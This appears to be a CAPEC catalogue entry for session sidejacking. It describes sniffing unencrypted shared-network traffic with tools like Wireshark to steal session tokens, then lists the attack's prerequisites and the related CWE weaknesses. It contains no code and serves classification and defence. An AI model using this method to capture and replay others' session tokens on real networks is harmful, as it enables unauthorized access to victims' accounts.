CAPEC-102: Session Sidejacking

Description
Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.

Severity :

High

Possibility :

High

Type :

Detailed
Relationships with other CAPECs

This table shows the other attack patterns and high level categories that are related to this attack pattern.

CAPEC-593: Session Hijacking Session Hijacking
Prerequisites

This table shows the other attack patterns and high level categories that are related to this attack pattern.

  • An attacker and the victim are both using the same WiFi network.
  • The victim has an active session with a target system.
  • The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)
  • The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically "rings home" asynchronously using the session token
Skills required

This table shows the other attack patterns and high level categories that are related to this attack pattern.

  • Low Easy to use tools exist to automate this attack.
Taxonomy mappings

Mappings to ATT&CK, OWASP and other frameworks.

Resources required

A packet sniffing tool, such as wireshark, can be used to capture session information.

Related CWE

A Related Weakness relationship associates a weakness with this attack pattern. Each association implies a weakness that must exist for a given attack to be successful.

CWE-294: Authentication Bypass by Capture-replay

CWE-319: Cleartext Transmission of Sensitive Information

CWE-522: Insufficiently Protected Credentials

CWE-523: Unprotected Transport of Credentials

CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute

Visit http://capec.mitre.org/ for more details.